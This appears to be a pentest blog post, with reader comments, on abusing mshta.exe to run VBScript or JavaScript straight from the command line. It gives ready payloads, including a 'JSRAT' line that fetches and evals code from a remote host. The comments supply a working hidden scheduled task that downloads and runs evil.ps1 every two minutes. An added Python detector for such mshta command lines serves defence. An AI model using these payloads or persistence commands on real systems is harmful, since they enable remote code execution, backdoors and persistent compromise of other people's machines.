Exec Commands Via Mshta.exe
in Pentest Case Studies and Tricks (渗透案例奇技淫巧) with 2 comments

While writing up the ransomware trojan built with "the world's best programming language", I noticed that the attacker used mshta to execute commands. I had not worked with it much before, and there is not much material on it either. mshta is the host for .hta files, but testing showed that no .hta file is needed at all: mshta can execute commands directly from the command line. A few more tests showed that it accepts not only VBScript but also JavaScript. The payloads are collected below:

VBSCRIPT EXEC

mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)

JAVASCRIPT EXEC

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

JSRAT

mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
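As an added defender-side example (not code from the original post), the following Python flags the inline mshta pattern shown above in process-creation records: a vbscript:/javascript: protocol handler in place of an .hta file, COM automation objects such as WScript.Shell or WinHttp.WinHttpRequest, %20-encoded spaces, and a remote URL. The record layout and the sample events are constructed to resemble Sysmon Event ID 1 fields and are assumptions, not real telemetry.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();'
                    r'h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");'
                    r'h.Open("GET","http://192.168.2.101:9998/connect",false);'},
    # Benign: mshta launched with an ordinary .hta file argument.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    # Not mshta at all; must be ignored regardless of its arguments.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe javascript:notes.txt"},
]

# Protocol handlers that let mshta run script straight from the command line.
INLINE_PROTOCOL = re.compile(r"\b(vbscript|javascript|about):", re.IGNORECASE)
# COM objects typically used to run commands or fetch a second stage.
SUSPICIOUS_TOKENS = ("ActiveXObject", "WScript.Shell", "WinHttp.WinHttpRequest",
                     "RunHTMLApplication", "XMLHTTP")
HTA_FILE = re.compile(r"\.hta\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def analyze_mshta(event):
    """Return the reasons an mshta process-creation event looks suspicious ([] if none)."""
    if not event.get("Image", "").lower().endswith("mshta.exe"):
        return []
    cmd = event.get("CommandLine", "")
    lower = cmd.lower()
    reasons = []
    if INLINE_PROTOCOL.search(cmd):
        reasons.append("inline script protocol handler (no .hta file required)")
    hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in lower]
    if hits:
        reasons.append("COM automation objects in command line: " + ", ".join(hits))
    if "%20" in cmd:
        reasons.append("URL-encoded spaces (%20) in command line")
    url = REMOTE_URL.search(cmd)
    if url:
        reasons.append("remote URL in command line: " + url.group(0))
    if not reasons and not HTA_FILE.search(cmd):
        reasons.append("mshta launched without an .hta file argument")
    return reasons


def scan(events):
    """Return (CommandLine, reasons) for every event that analyze_mshta flags."""
    flagged = []
    for event in events:
        reasons = analyze_mshta(event)
        if reasons:
            flagged.append((event["CommandLine"], reasons))
    return flagged
```

Applied to the constructed records, only the two inline-script launches are reported; the plain .hta launch and the non-mshta process are not.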

Demo (screenshot):

Can you guess what else you can do with it? Hahaha.

Responses
  1. stonedeyy

Hi, I have a question. When I add a scheduled task with schtasks /create /tn mytask /tr "powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.1/evil.ps1')" /sc MINUTE /mo 2, Task Scheduler shows 'http://192.168.137.1/evil.ps1' as "http://192.168.137.1/evil.ps1": the single quotes turn into double quotes, so the script cannot be downloaded. I don't know how to fix this so that the single quotes stay as they are. Any advice would be appreciated, thanks.

    Reply
    1. @stonedeyy

I think your command is wrong. Try this one: schtasks /create /tn mytask /tr "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.1/evil.ps1');\"" /sc MINUTE /mo 2

      Reply